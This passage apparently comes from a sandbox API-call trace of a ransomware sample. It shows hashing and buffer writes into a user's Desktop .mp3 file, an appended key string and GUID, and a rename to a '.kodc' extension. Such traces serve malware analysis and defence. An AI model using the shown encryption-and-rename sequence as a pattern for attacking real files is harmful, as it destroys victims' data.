CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.836] GetLastError () returned 0x0 [0100.836] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.836] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0100.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.836] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.836] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.836] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2b90) returned 0x9ba8d90 [0100.837] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5ae8 [0100.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e48 [0100.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5b30 [0100.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e60 [0100.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e90 [0100.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ea8 [0100.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.837] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0100.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e90 | out: hHeap=0x630000) returned 1 [0100.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ea8 | out: hHeap=0x630000) returned 1 [0100.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0100.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7ea8 [0100.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0100.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7e90 [0100.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0100.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0100.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0100.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0100.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ea8 | out: hHeap=0x630000) returned 1 [0100.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e90 | out: hHeap=0x630000) returned 1 [0100.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.838] GetCurrentThreadId () returned 0x42c [0100.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba7738 [0100.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.838] GetCurrentThreadId () returned 0x42c [0100.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0100.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e90 [0100.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0100.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ea8 [0100.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e78 [0100.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7ec0 [0100.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a10 [0100.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0100.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e90 | out: hHeap=0x630000) returned 1 [0100.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e90 [0100.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0100.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0100.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0100.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e90 | out: hHeap=0x630000) returned 1 [0100.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0100.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.841] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ec0 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ea8 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e78 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e60 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb5b30 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0100.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.842] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba8d90*, nNumberOfBytesToWrite=0x2b8c, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba8d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x2b8c, lpOverlapped=0x0) returned 1 [0100.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba8d90 | out: hHeap=0x630000) returned 1 [0100.842] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x2b91, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.842] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0100.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0100.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0100.843] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.843] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.843] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.843] CloseHandle (hObject=0x5cc) returned 1 [0100.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x32c9230 [0100.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0100.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c9230 | out: hHeap=0x630000) returned 1 [0100.844] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\ZHTOAxESRSu4ZX.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kmpcg-yoqu21bwvljwxx\\zhtoaxesrsu4zx.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\ZHTOAxESRSu4ZX.mp3.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kmpcg-yoqu21bwvljwxx\\zhtoaxesrsu4zx.mp3.kodc")) returned 1 [0100.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0100.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.845] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f3058 | out: hHeap=0x630000) returned 1 [0100.846] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafa2960, ftCreationTime.dwHighDateTime=0x1d5bf85, ftLastAccessTime.dwLowDateTime=0x72f2bc10, ftLastAccessTime.dwHighDateTime=0x1d5c1cb, ftLastWriteTime.dwLowDateTime=0x72f2bc10, ftLastWriteTime.dwHighDateTime=0x1d5c1cb, nFileSizeHigh=0x0, nFileSizeLow=0x2b91, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZHTOAxESRSu4ZX.mp3", cAlternateFileName="ZHTOAX~1.MP3")) returned 0 [0100.846] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0100.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0100.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0100.847] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0100.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dc90 [0100.847] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0100.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332de70 | out: hHeap=0x630000) returned 1 [0100.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332de70 | out: hHeap=0x630000) returned 1 [0100.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332de70 | out: hHeap=0x630000) returned 1 [0100.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332de70 | out: hHeap=0x630000) returned 1 [0100.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332de70 | out: hHeap=0x630000) returned 1 [0100.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0100.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332de70 | out: hHeap=0x630000) returned 1 [0100.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0100.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0100.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332de70 | out: hHeap=0x630000) returned 1 [0100.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.848] HeapFree (in: hHeap=0x630000, 